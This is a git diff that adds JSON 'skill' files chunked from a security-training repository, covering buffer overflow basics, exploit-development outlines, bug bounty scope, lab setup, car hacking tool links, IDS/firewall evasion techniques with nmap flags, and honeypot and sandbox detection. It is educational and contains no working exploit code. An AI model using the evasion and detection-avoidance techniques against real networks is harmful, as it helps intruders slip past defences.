+ "title": "what is buffer overflow",
+ "description": "# What is a Buffer Overflow?\n\n## Introduction\n\nA **buffer overflow** is a software vulnerability that occurs when a program writes more data to a buffer (a temporary storage area in memory) than it can hold. When this happens, the excess data \"overflows\" into adjacent memory locations, potentially overwriting important data structures, function return addresses, or even executable code.\n\nBuffer overflows are among the most dangerous and historically significant security vulnerabilities, forming ",
+ "payloads": [
+ "# What is a Buffer Overflow?",
+ "## Introduction",
+ "A **buffer overflow** is a software vulnerability that occurs when a program writes more data to a buffer (a temporary storage area in memory) than it can hold. When this happens, the excess data \"overflows\" into adjacent memory locations, potentially overwriting important data structures, function return addresses, or even executable code.",
+ "Buffer overflows are among the most dangerous and historically significant security vulnerabilities, forming the basis for many famous exploits including the Morris Worm (1988) and countless modern attacks.",
+ "## The Basic Concept",
+ "Think of a buffer like a cup:",
+ "- The cup has a fixed capacity (e.g., 8 ounces)",
+ "- If you pour more liquid than the cup can hold, it overflows",
+ "- The overflow liquid spills onto the surrounding surface",
+ "In computing:",
+ "- A buffer has a fixed size (e.g., 20 bytes)",
+ "- If you write more data than the buffer can hold, it overflows",
+ "- The overflow data spills into adjacent memory locations",
+ "## A Simple Example",
+ "#include "
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/basics/what-is-buffer-overflow.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_f56125cf1546.json b/skills/buffer_overflow_examples_f56125cf1546.json
new file mode 100644
index 0000000..639a56a
--- /dev/null
+++ b/skills/buffer_overflow_examples_f56125cf1546.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_f56125cf1546",
+ "category": "buffer-overflow-examples",
+ "title": "external platforms",
+ "description": "# External Learning Platforms and Practice Environments\n\n## Overview\n\nHands-on practice is essential for mastering buffer overflow exploitation. This guide lists reputable platforms, challenges, and resources where you can safely practice your skills in controlled, legal environments.\n\n## Dedicated Learning Platforms\n\n### Exploit Education\n\n**URL:** https://exploit.education\n\n**Description:** Comprehensive learning platform with multiple virtual machines for different skill levels.\n\n**Virtual Ma",
+ "payloads": [
+ "# External Learning Platforms and Practice Environments",
+ "## Overview",
+ "Hands-on practice is essential for mastering buffer overflow exploitation. This guide lists reputable platforms, challenges, and resources where you can safely practice your skills in controlled, legal environments.",
+ "## Dedicated Learning Platforms",
+ "### Exploit Education",
+ "**URL:** https://exploit.education",
+ "**Description:** Comprehensive learning platform with multiple virtual machines for different skill levels.",
+ "**Virtual Machines:**",
+ "#### 1. Phoenix",
+ "- **Focus**: Modern binary exploitation",
+ "- **Architecture**: x86-64",
+ "- **Topics**:",
+ "- Stack buffer overflows",
+ "- Format strings",
+ "- Heap exploitation"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/resources/external-platforms.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_fd290e37e142.json b/skills/buffer_overflow_examples_fd290e37e142.json
new file mode 100644
index 0000000..332ed6d
--- /dev/null
+++ b/skills/buffer_overflow_examples_fd290e37e142.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_fd290e37e142",
+ "category": "buffer-overflow-examples",
+ "title": "writing exploits",
+ "description": "# Writing Exploits for Buffer Overflows\n\n## Introduction\n\nWriting exploits is both an art and a science. It requires understanding of:\n- Assembly language and CPU architecture\n- Memory layout and stack operations\n- Operating system internals\n- Debugging and reverse engineering\n- Creative problem-solving\n\nThis guide walks through the complete process of developing buffer overflow exploits from initial analysis to working payloads.\n\n## The Exploit Development Process\n\n### Phase 1: Reconnaissance a",
+ "payloads": [
+ "# Writing Exploits for Buffer Overflows",
+ "## Introduction",
+ "Writing exploits is both an art and a science. It requires understanding of:",
+ "- Assembly language and CPU architecture",
+ "- Memory layout and stack operations",
+ "- Operating system internals",
+ "- Debugging and reverse engineering",
+ "- Creative problem-solving",
+ "This guide walks through the complete process of developing buffer overflow exploits from initial analysis to working payloads.",
+ "## The Exploit Development Process",
+ "### Phase 1: Reconnaissance and Analysis",
+ "1. Identify vulnerability",
+ "2. Understand the target",
+ "3. Analyze protection mechanisms",
+ "4. Gather information"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/exploitation/writing-exploits.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/bug_bounties_d90b5b37b6e7.json b/skills/bug_bounties_d90b5b37b6e7.json
new file mode 100644
index 0000000..34c3e02
--- /dev/null
+++ b/skills/bug_bounties_d90b5b37b6e7.json
@@ -0,0 +1,27 @@
+{
+ "id": "bug_bounties_d90b5b37b6e7",
+ "category": "bug-bounties",
+ "title": "scope example",
+ "description": "# Omar's Bug Bounty Program Scope Template\n\n## Introduction\n\nBriefly describe the objectives of your bug bounty program and what you hope to achieve through it.\n\n## Target Systems\n\n### In-Scope Targets\n\n- **Web Applications**\n - app1.websploit.org\n - app2.websploit.org\n- **Mobile Applications**\n - Android App (version x.x and above)\n - iOS App (version x.x and above)\n- **APIs**\n - api.websploit.org/v1/\n - api.websploit.org/v2/\n\n### Out-of-Scope Targets\n\n- app3.websploit.org\n\n## Vulnerabili",
+ "payloads": [
+ "# Omar's Bug Bounty Program Scope Template",
+ "## Introduction",
+ "Briefly describe the objectives of your bug bounty program and what you hope to achieve through it.",
+ "## Target Systems",
+ "### In-Scope Targets",
+ "- **Web Applications**",
+ "- app1.websploit.org",
+ "- app2.websploit.org",
+ "- **Mobile Applications**",
+ "- Android App (version x.x and above)",
+ "- iOS App (version x.x and above)",
+ "- **APIs**",
+ "- api.websploit.org/v1/",
+ "- api.websploit.org/v2/",
+ "### Out-of-Scope Targets"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Engagement_Management/Pre_Engagement_Activities/bug-bounties/scope_example.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/bug_bounties_f9dde847b5d3.json b/skills/bug_bounties_f9dde847b5d3.json
new file mode 100644
index 0000000..7ee4c18
--- /dev/null
+++ b/skills/bug_bounties_f9dde847b5d3.json
@@ -0,0 +1,27 @@
+{
+ "id": "bug_bounties_f9dde847b5d3",
+ "category": "bug-bounties",
+ "title": "scope example",
+ "description": "# Omar's Bug Bounty Program Scope Template\n\n## Introduction\n\nBriefly describe the objectives of your bug bounty program and what you hope to achieve through it.\n\n## Target Systems\n\n### In-Scope Targets\n\n- **Web Applications**\n - app1.websploit.org\n - app2.websploit.org\n- **Mobile Applications**\n - Android App (version x.x and above)\n - iOS App (version x.x and above)\n- **APIs**\n - api.websploit.org/v1/\n - api.websploit.org/v2/\n\n### Out-of-Scope Targets\n\n- app3.websploit.org\n\n## Vulnerabili",
+ "payloads": [
+ "# Omar's Bug Bounty Program Scope Template",
+ "## Introduction",
+ "Briefly describe the objectives of your bug bounty program and what you hope to achieve through it.",
+ "## Target Systems",
+ "### In-Scope Targets",
+ "- **Web Applications**",
+ "- app1.websploit.org",
+ "- app2.websploit.org",
+ "- **Mobile Applications**",
+ "- Android App (version x.x and above)",
+ "- iOS App (version x.x and above)",
+ "- **APIs**",
+ "- api.websploit.org/v1/",
+ "- api.websploit.org/v2/",
+ "### Out-of-Scope Targets"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/bug-bounties/scope_example.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/build_your_own_lab_719ac92b213d.json b/skills/build_your_own_lab_719ac92b213d.json
new file mode 100644
index 0000000..9ed8902
--- /dev/null
+++ b/skills/build_your_own_lab_719ac92b213d.json
@@ -0,0 +1,27 @@
+{
+ "id": "build_your_own_lab_719ac92b213d",
+ "category": "build-your-own-lab",
+ "title": "docker resources",
+ "description": "# Docker Resources\n\n## Where to start\n\n- [Basics \u2013 Docker, Containers, Hypervisors, CoreOS](http://etherealmind.com/basics-docker-containers-hypervisors-coreos/)\n- [Dive Into Docker: From \"What is Docker?\" to \"Hello World\"](https://www.youtube.com/watch?v=XeSD17YRijk&list=PL-v3vdeWVEsXT-u0JDQZnM90feU3NE3v8) (60:25) by [@nickjanetakis][nickjanetakis]\n- [Docker Curriculum](https://docker-curriculum.com): A comprehensive tutorial for getting started with Docker. Teaches how to use Docker and deploy",
+ "payloads": [
+ "# Docker Resources",
+ "## Where to start",
+ "- [Basics \u2013 Docker, Containers, Hypervisors, CoreOS](http://etherealmind.com/basics-docker-containers-hypervisors-coreos/)",
+ "- [Dive Into Docker: From \"What is Docker?\" to \"Hello World\"](https://www.youtube.com/watch?v=XeSD17YRijk&list=PL-v3vdeWVEsXT-u0JDQZnM90feU3NE3v8) (60:25) by [@nickjanetakis][nickjanetakis]",
+ "- [Docker Curriculum](https://docker-curriculum.com): A comprehensive tutorial for getting started with Docker. Teaches how to use Docker and deploy dockerized apps on AWS with Elastic Beanstalk and Elastic Container Service.",
+ "- [Docker Documentation](https://docs.docker.com/)",
+ "- [Docker for all - Developers, Testers, DevOps, Product Owners + Videos](https://github.com/machzqcq/docker-for-all) Docker Training Videos for all",
+ "- [Docker Jumpstart](https://github.com/odewahn/docker-jumpstart/): a quick introduction",
+ "- [Docker Training](https://training.docker.com/) - Includes a free self-paced hands-on tutorial (free registration required or sign-in with DockerHub ID)",
+ "- [Katacoda](https://www.katacoda.com/): Learn Docker using Interactive Browser-Based Labs",
+ "- [Learn Docker](https://github.com/dwyl/learn-docker) Full environment set up, screenshots, step-by-step tutorial and more resources (video, articles, cheat sheets) by [@dwyl](https://github.com/dwyl)",
+ "- [Play With Docker](https://training.play-with-docker.com/) - PWD is a great way to get started with Docker from beginner to advanced users. Docker runs directly in your browser.",
+ "- [Play With Moby](http://play-with-moby.com/) - PWM is a web based Moby playground which allows you to try different components of the platform in seconds. It gives you the experience of having a free Alpine Linux Virtual Machine in the cloud where you can build and run Moby projects and even create clusters to experiment.",
+ "- [Practical Introduction to Container Terminology](https://developers.redhat.com/blog/2018/02/22/container-terminology-practical-introduction/) The landscape for container technologies is larger than just docker. Without a good handle on the terminology, It can be difficult to grasp the key differences between docker and (pick your favorites, CRI-O, rkt, lxc/lxd) or understand what the Open Container Initiative is doing to standardize container technology.",
+ "**Cheatsheets** by"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/build-your-own-lab/docker_resources.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/build_your_own_lab_aff4a2b21ae6.json b/skills/build_your_own_lab_aff4a2b21ae6.json
new file mode 100644
index 0000000..ddef029
--- /dev/null
+++ b/skills/build_your_own_lab_aff4a2b21ae6.json
@@ -0,0 +1,27 @@
+{
+ "id": "build_your_own_lab_aff4a2b21ae6",
+ "category": "build-your-own-lab",
+ "title": "ansible terraform vagrant",
+ "description": "# Lab Automation - Ansible, Vagrant, and Terraform\n\n| **Attribute** | **Ansible** | **Vagrant** | **Terraform** |\n|--------------------------|---------------------------------------------------|--------------------------------------------------|-------------------------------------------------|\n| **Type** | Configuration Management Tool | Vir",
+ "payloads": [
+ "# Lab Automation - Ansible, Vagrant, and Terraform",
+ "| **Attribute** | **Ansible** | **Vagrant** | **Terraform** |",
+ "|--------------------------|---------------------------------------------------|--------------------------------------------------|-------------------------------------------------|",
+ "| **Type** | Configuration Management Tool | Virtualization/Provisioning Tool | Infrastructure as Code (IaC) Tool |",
+ "| **Primary Use Case** | Application deployment, system configuration | Environment virtualization and provisioning | Provisioning and managing infrastructure |",
+ "| **Declarative vs Procedural** | Declarative | Declarative with some procedural elements | Declarative |",
+ "| **State Management** | Stateless (doesn't track state by default) | Stateless (doesn't track state) | Stateful (tracks infrastructure state) |",
+ "| **Infrastructure Abstraction** | Limited, primarily focuses on server configuration | Local VM/Container-based environments | Full cloud infrastructure abstraction |",
+ "| **Supported Environments** | Linux, Windows, Cloud Providers (AWS, GCP, Azure), Containers | Local environments (VirtualBox, VMware, Docker) | Cloud Providers (AWS, GCP, Azure), On-Premises, Containers |",
+ "| **Provisioning Approach** | Agentless, using SSH or WinRM to execute playbooks on nodes | Requires a local hypervisor or container engine | Agentless, communicates directly with cloud providers\u2019 APIs |",
+ "| **Idempotency** | Yes (ensures same task doesn\u2019t run again if no change is required) | No (relies on external tools for idempotency) | Yes (recreates infrastructure if there is drift) |",
+ "| **Learning Curve** | Moderate (YAML syntax, playbook concepts) | Easy (focuses on developer environments) | Moderate (HCL syntax, more complex logic) |",
+ "| **Extensibility** | Highly extensible via modules, roles, and plugins | Limited to providers and provisioners supported by Vagrant | Extensible with plugins and providers for different platforms |",
+ "| **Language** | YAML (Playbooks) | Ruby (Vagrantfiles) | HCL (HashiCorp Configuration Language) |",
+ "| **Orchestration Support** | Yes (can orchestrate multiple systems and services) | No (focuses on single-machine provisioning) | No (mainly focused on declarative infrastructure definition) |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/build-your-own-lab/ansible_terraform_vagrant.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/build_your_own_lab_de73f28e7ed7.json b/skills/build_your_own_lab_de73f28e7ed7.json
new file mode 100644
index 0000000..03931b3
--- /dev/null
+++ b/skills/build_your_own_lab_de73f28e7ed7.json
@@ -0,0 +1,27 @@
+{
+ "id": "build_your_own_lab_de73f28e7ed7",
+ "category": "build-your-own-lab",
+ "title": "security onion proxmox",
+ "description": "# Security Onion, RedHunt OS, Proxmox, and Open\u00a0vSwitch\nIf you have attended some of my classes and read some of my books, you know that I really like [Proxmox](https://www.proxmox.com/en/). I have several Proxmox clusters that I use for my training courses and to develop labs to learn new cybersecurity skills (offensive and defensive techniques). \n\nYou can instantiate Linux systems such as [Kali Linux](https://www.kali.org/), [WebSploit](https://websploit.org), [Parrot](https://parrotlinux.org/",
+ "payloads": [
+ "# Security Onion, RedHunt OS, Proxmox, and Open\u00a0vSwitch",
+ "If you have attended some of my classes and read some of my books, you know that I really like [Proxmox](https://www.proxmox.com/en/). I have several Proxmox clusters that I use for my training courses and to develop labs to learn new cybersecurity skills (offensive and defensive techniques).",
+ "You can instantiate Linux systems such as [Kali Linux](https://www.kali.org/), [WebSploit](https://websploit.org), [Parrot](https://parrotlinux.org/), [BlackArch](https://blackarch.org/), [Security Onion](https://securityonion.net), [RedHuntOS](https://github.com/redhuntlabs/RedHunt-OS), and others in different VMs to practice and learn new skills in a safe environment.",
+ "Systems like [Security Onion](https://securityonion.net) and [RedHuntOS](https://github.com/redhuntlabs/RedHunt-OS) come with with [Snort](https://www.snort.org/), [Suricata](https://suricata-ids.org/), [ELK](https://www.elastic.co/what-is/elk-stack), and many other security tools that allow you to monitor your network.",
+ "You have to setup [port mirroring](https://en.wikipedia.org/wiki/Port_mirroring) for IDS/IPS systems like Snort to be able to monitor traffic. In Proxmox, you can setup [Linux bridges](https://pve.proxmox.com/wiki/Network_Configuration) and [Open vSwitch (OVS) bridges](https://pve.proxmox.com/wiki/Open_vSwitch).",
+ "## OVS Setup",
+ "I strongly recommend to use OVS bridges to send traffic to your Security Onion VM (or whatever other VM you would like to capture packets or monitor for IDS/IPS functions.",
+ "- **Note:** A bridge is another term for a Switch. It directs traffic to the appropriate interface based on mac address. Open vSwitch bridges should contain raw ethernet devices, along with virtual interfaces such as OVSBonds or OVSIntPorts. These bridges can carry multiple vlans, and be broken out into 'internal ports' to be used as vlan interfaces on the host.",
+ "1. First, you need to update the package index and then install the Open vSwitch packages by executing:",
+ "apt update",
+ "apt install openvswitch-switch",
+ "2. Then you can create an OVS bridge and assign the interfaces of each VM that you want to capture packets to that OVS bridge.",
+ "3. You then configure the `tap` interfaces. These are only visible in the system shell (not in the Proxmox GUI) and are added automatically for VMs attached to an OVS-bridge interface. The naming convention of the tap interfaces is based on the ID of the VM they are assigned to, with the name `tap[VM-ID]i[interface#]`.",
+ "For example, these are some of the interfaces in one of the Proxmox nodes/servers in one of my clusters:",
+ "\u250c\u2500[root@hermes]\u2500[~]"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/build-your-own-lab/security-onion-proxmox.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/car_hacking_918d441669f8.json b/skills/car_hacking_918d441669f8.json
new file mode 100644
index 0000000..083762c
--- /dev/null
+++ b/skills/car_hacking_918d441669f8.json
@@ -0,0 +1,25 @@
+{
+ "id": "car_hacking_918d441669f8",
+ "category": "car-hacking",
+ "title": "tools",
+ "description": "# Car Hacking Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [4CAN - Open Source Security Tool to Find Security Vulnerabilities in Modern Cars](http://feedproxy.google.com/~r/PentestTools/~3/Hpal2tcA9oc/4can-open-source-security-tool-to-find.html)\n- [Adamantium-Thief - Decrypt Chromium Based Browsers Passwords, Cookies, Credit Cards, History, Bookmarks](http://feedproxy.google.com/~r/PentestTools/~3/bJRNo4eIwn4/adamantium-thief-decrypt-chromium-based.html)\n- [AutoResponder - C",
+ "payloads": [
+ "# Car Hacking Tools",
+ "This is a curated list of tools for this category.",
+ "- [4CAN - Open Source Security Tool to Find Security Vulnerabilities in Modern Cars](http://feedproxy.google.com/~r/PentestTools/~3/Hpal2tcA9oc/4can-open-source-security-tool-to-find.html)",
+ "- [Adamantium-Thief - Decrypt Chromium Based Browsers Passwords, Cookies, Credit Cards, History, Bookmarks](http://feedproxy.google.com/~r/PentestTools/~3/bJRNo4eIwn4/adamantium-thief-decrypt-chromium-based.html)",
+ "- [AutoResponder - Carbon Black Response IR Tool](http://www.kitploit.com/2022/05/autoresponder-carbon-black-response-ir.html)",
+ "- [CarPunk - The Car Hacking Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/GsLUHFbclmc/carpunk-car-hacking-toolkit.html)",
+ "- [Cariddi - Take A List Of Domains, Crawl Urls And Scan For Endpoints, Secrets, Api Keys, File Extensions, Tokens And More...](http://feedproxy.google.com/~r/PentestTools/~3/p87M-KAS3hw/cariddi-take-list-of-domains-crawl-urls.html)",
+ "- [Carina - Webshell, Virtual Private Server (VPS) And cPanel Database](http://feedproxy.google.com/~r/PentestTools/~3/XTsZSdEvD1s/carina-webshell-virtual-private-server.html)",
+ "- [Carnivore - Tool For Assessing On-Premises Microsoft Servers Authentication Such As ADFS, Skype, Exchange, And RDWeb](http://feedproxy.google.com/~r/PentestTools/~3/eop7VIkun_w/carnivore-tool-for-assessing-on.html)",
+ "- [Scarce-Apache2 - A Framework For Bug Hunting Or Pentesting Targeting Websites That Have CVE-2021-41773 Vulnerability In Public](http://feedproxy.google.com/~r/PentestTools/~3/8_TI1-FA7is/scarce-apache2-framework-for-bug.html)",
+ "- [Security Scorecards - Security Health Metrics For Open Source](http://feedproxy.google.com/~r/PentestTools/~3/qbMhF4J-_lo/security-scorecards-security-health.html)",
+ "- [BlackFlag ECU](https://github.com/bad-antics/blackflag-ecu) - Professional automotive ECU diagnostics and tuning suite. Supports CAN bus analysis, UDS/KWP2000 protocols, and security research on automotive systems. Written in Rust.",
+ "- [NullSec Linux](https://github.com/bad-antics/nullsec-linux) - Security-focused distribution with 135+ pentesting tools, including specialized Automotive edition for car hacking."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/car-hacking/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/certifications_1bef8a696409.json b/skills/certifications_1bef8a696409.json
new file mode 100644
index 0000000..5ca25dc
--- /dev/null
+++ b/skills/certifications_1bef8a696409.json
@@ -0,0 +1,27 @@
+{
+ "id": "certifications_1bef8a696409",
+ "category": "certifications",
+ "title": "evading ids firewalls",
+ "description": "# Techniques for Evading IDS\n\n1. **Traffic Obfuscation**:\n - **Encryption**: Encrypting traffic can prevent IDS from inspecting the payload. For example, using tools like **Stunnel** or **OpenVPN** to encrypt data streams.\n - **Encoding**: Encoding payloads in formats like Base64 or using URL encoding can obscure the content. For example, encoding an SQL injection payload to bypass detection filters.\n\n2. **Fragmentation**:\n - **Packet Fragmentation**: Breaking malicious payloads into small",
+ "payloads": [
+ "# Techniques for Evading IDS",
+ "1. **Traffic Obfuscation**:",
+ "- **Encryption**: Encrypting traffic can prevent IDS from inspecting the payload. For example, using tools like **Stunnel** or **OpenVPN** to encrypt data streams.",
+ "- **Encoding**: Encoding payloads in formats like Base64 or using URL encoding can obscure the content. For example, encoding an SQL injection payload to bypass detection filters.",
+ "2. **Fragmentation**:",
+ "- **Packet Fragmentation**: Breaking malicious payloads into smaller packets can evade detection by causing IDS to miss reassembled payloads. Techniques like IP fragmentation or TCP segmentation can be used.",
+ "3. **Polymorphism and Metamorphism**:",
+ "- **Polymorphic Code**: Altering the code structure without changing its functionality to evade signature-based detection. For example, changing variable names or code layout.",
+ "- **Metamorphic Code**: Completely rewriting the code to avoid signature detection. This involves transforming the code into a different form while maintaining the same behavior.",
+ "4. **Protocol Manipulation**:",
+ "- **Protocol Tunneling**: Encapsulating malicious traffic within legitimate protocols. For instance, using HTTP or DNS tunneling to bypass IDS inspection.",
+ "- **Protocol Abuses**: Exploiting protocol features to hide malicious payloads. For example, using malformed packets or unusual protocol behaviors.",
+ "# Techniques for Evading Firewalls",
+ "1. **Port Knocking**:",
+ "- **Description**: A technique where an attacker sends a sequence of connection attempts to closed ports. If the correct sequence is detected, the firewall temporarily opens a port for the attacker."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/certifications/additional_materials_for_certs/evading_ids_firewalls.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/certifications_464b6b572f77.json b/skills/certifications_464b6b572f77.json
new file mode 100644
index 0000000..9ccf3c7
--- /dev/null
+++ b/skills/certifications_464b6b572f77.json
@@ -0,0 +1,27 @@
+{
+ "id": "certifications_464b6b572f77",
+ "category": "certifications",
+ "title": "tools to evade ids fw",
+ "description": "# Tools to Evade IDS, IPS, and Firewalls\n\nThere are various techniques and tools that can be used to evade these security measures. Below is a summary of some of the most common methods and tools for evading IDS, IPS, and firewalls.\n\n#### Techniques for Evasion\n\n1. **TTL Manipulation**:\n - Sending packets with a Time-To-Live (TTL) value that allows them to reach the IDS/IPS but not the final destination can trick the system into ignoring subsequent packets with the same sequence but malicious ",
+ "payloads": [
+ "# Tools to Evade IDS, IPS, and Firewalls",
+ "There are various techniques and tools that can be used to evade these security measures. Below is a summary of some of the most common methods and tools for evading IDS, IPS, and firewalls.",
+ "#### Techniques for Evasion",
+ "1. **TTL Manipulation**:",
+ "- Sending packets with a Time-To-Live (TTL) value that allows them to reach the IDS/IPS but not the final destination can trick the system into ignoring subsequent packets with the same sequence but malicious content.",
+ "- **Nmap Option**: `--ttl ` [1].",
+ "2. **Avoiding Signatures**:",
+ "- Adding garbage data to packets to avoid matching IDS/IPS signatures.",
+ "- **Nmap Option**: `--data-length 25` [1].",
+ "3. **Fragmented Packets**:",
+ "- Fragmenting packets so that if the IDS/IPS cannot reassemble them, they will pass through undetected.",
+ "- **Nmap Option**: `-f` [1][4].",
+ "4. **Invalid Checksum**:",
+ "- Sending packets with invalid checksums, which are often ignored by sensors for performance reasons but rejected by the final host.",
+ "- Example: A packet with the RST flag and an invalid checksum [1]."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/certifications/additional_materials_for_certs/tools_to_evade_ids_fw.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/certifications_73203dc5bb86.json b/skills/certifications_73203dc5bb86.json
new file mode 100644
index 0000000..5237591
--- /dev/null
+++ b/skills/certifications_73203dc5bb86.json
@@ -0,0 +1,16 @@
+{
+ "id": "certifications_73203dc5bb86",
+ "category": "certifications",
+ "title": "cybersec certifications",
+ "description": "# Lists of Cybersecurity Certifications\n\nThank you to @gds-domingues! He created a dynamic table in Notion that includes many certifications [**here**](https://gdsdefence.notion.site/1c3b843c69aa81e68467cbaf8272783a?v=1c3b843c69aa81dcbb6b000cb9f6495a)\n\nThe table is divided by Level, company, and focus to facilitate interaction with certifications, remembering that there is a fine line between different levels. Therefore, it is possible that a certain certification may be intermediate for some wh",
+ "payloads": [
+ "# Lists of Cybersecurity Certifications",
+ "Thank you to @gds-domingues! He created a dynamic table in Notion that includes many certifications [**here**](https://gdsdefence.notion.site/1c3b843c69aa81e68467cbaf8272783a?v=1c3b843c69aa81dcbb6b000cb9f6495a)",
+ "The table is divided by Level, company, and focus to facilitate interaction with certifications, remembering that there is a fine line between different levels. Therefore, it is possible that a certain certification may be intermediate for some while expert for others.",
+ "In addition, Paul Jerimy created a [cybersecurity certification roadmap matrix](https://github.com/PaulJerimy/SecCertRoadmapHTML) that can be accessed at: https://pauljerimy.com/security-certification-roadmap/"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/certifications/cybersec_certifications.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/certifications_7aac83a6bef7.json b/skills/certifications_7aac83a6bef7.json
new file mode 100644
index 0000000..87f3108
--- /dev/null
+++ b/skills/certifications_7aac83a6bef7.json
@@ -0,0 +1,27 @@
+{
+ "id": "certifications_7aac83a6bef7",
+ "category": "certifications",
+ "title": "Understanding IDS Firewall Evasion Countermeasures",
+ "description": "# Understanding IDS/Firewall Evasion Countermeasures\n\n**1. Enhancing IDS Effectiveness**\n\n1. **Regular Updates and Tuning**:\n - **Signature Updates**: Keep IDS signatures up-to-date to detect new and evolving threats. Regular updates ensure that the IDS can recognize the latest attack patterns and techniques.\n - **Rule Tuning**: Customize and fine-tune IDS rules to reduce false positives and false negatives. Regularly review and adjust the rule sets based on current threat intelligence and n",
+ "payloads": [
+ "# Understanding IDS/Firewall Evasion Countermeasures",
+ "**1. Enhancing IDS Effectiveness**",
+ "1. **Regular Updates and Tuning**:",
+ "- **Signature Updates**: Keep IDS signatures up-to-date to detect new and evolving threats. Regular updates ensure that the IDS can recognize the latest attack patterns and techniques.",
+ "- **Rule Tuning**: Customize and fine-tune IDS rules to reduce false positives and false negatives. Regularly review and adjust the rule sets based on current threat intelligence and network behavior.",
+ "2. **Behavioral and Anomaly Detection**:",
+ "- **Behavioral Analysis**: Implement IDS solutions that use behavioral analysis to detect unusual activities rather than relying solely on signature-based detection. This helps in identifying novel or disguised attacks.",
+ "- **Anomaly Detection**: Use anomaly detection to identify deviations from normal network behavior. This approach can catch previously unknown threats by highlighting atypical patterns.",
+ "3. **Traffic Encryption**:",
+ "- **Secure Protocols**: Use encryption protocols such as TLS/SSL for securing traffic. This prevents attackers from easily inspecting or manipulating traffic to evade detection.",
+ "- **TLS Inspection**: Implement TLS inspection capabilities to decrypt and analyze encrypted traffic for malicious content, ensuring that encrypted communications are also monitored.",
+ "4. **Rate Limiting and Throttling**:",
+ "- **Traffic Management**: Apply rate limiting and throttling to control the volume of traffic and prevent denial-of-service attacks. This helps in mitigating attempts to overwhelm IDS systems with excessive traffic.",
+ "**2. Strengthening Firewall Defenses**",
+ "1. **Layered Security Approach**:"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/certifications/additional_materials_for_certs/Understanding_IDS_Firewall_Evasion_Countermeasures.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/certifications_7f43a8435d69.json b/skills/certifications_7f43a8435d69.json
new file mode 100644
index 0000000..4f076e5
--- /dev/null
+++ b/skills/certifications_7f43a8435d69.json
@@ -0,0 +1,27 @@
+{
+ "id": "certifications_7f43a8435d69",
+ "category": "certifications",
+ "title": "detecting honeypots and sandboxes",
+ "description": "## Techniques for Detecting Honeypots\n\n1. **Network Behavior Analysis**:\n - **Unusual Traffic Patterns**: Honeypots may generate unusual traffic patterns or responses. Monitoring for anomalies in network traffic can help identify such systems.\n - **Fake Services**: Some honeypots run services that may have tell-tale signs of being fake, such as outdated software versions or uncommon service responses.\n\n2. **System Fingerprinting**:\n - **OS and Service Fingerprinting**: Using tools like **N",
+ "payloads": [
+ "## Techniques for Detecting Honeypots",
+ "1. **Network Behavior Analysis**:",
+ "- **Unusual Traffic Patterns**: Honeypots may generate unusual traffic patterns or responses. Monitoring for anomalies in network traffic can help identify such systems.",
+ "- **Fake Services**: Some honeypots run services that may have tell-tale signs of being fake, such as outdated software versions or uncommon service responses.",
+ "2. **System Fingerprinting**:",
+ "- **OS and Service Fingerprinting**: Using tools like **Nmap** or **Netcat**, attackers can probe systems to identify discrepancies in OS versions or service configurations that might indicate a honeypot.",
+ "- **Known Signatures**: Some honeypots have identifiable signatures or configurations. Comparing system responses against known signatures can help in detection.",
+ "3. **Interaction Analysis**:",
+ "- **Response Patterns**: Honeypots often have scripted or automated responses. Analyzing the nature and timing of responses can reveal if the system is a honeypot.",
+ "- **Behavioral Analysis**: Observing how the system behaves under different conditions. Honeypots might not handle edge cases or unusual commands as well as a real system would.",
+ "4. **Honeypot-Specific Tools**:",
+ "- **Honeypot Detection Tools**: Tools like **Honeyd Detector** or **Honeypot Hunter** can help in identifying honeypots by analyzing network traffic and system responses.",
+ "## Techniques for Detecting Sandboxes",
+ "1. **System and Environment Checks**:",
+ "- **File System Analysis**: Sandboxes may have distinct file system structures or paths. Malware can check for specific directories or files commonly associated with sandbox environments."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/certifications/additional_materials_for_certs/detecting_honeypots_and_sandboxes.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/certifications_e38d904d9ebd.json b/skills/certifications_e38d904d9ebd.json
new file mode 100644
index 0000000..1608921
--- /dev/null
+++ b/skills/certifications_e38d904d9ebd.json
@@ -0,0 +1,27 @@
+{
+ "id": "certifications_e38d904d9ebd",
+ "category": "certifications",
+ "title": "ids ips firewalls honeypots",
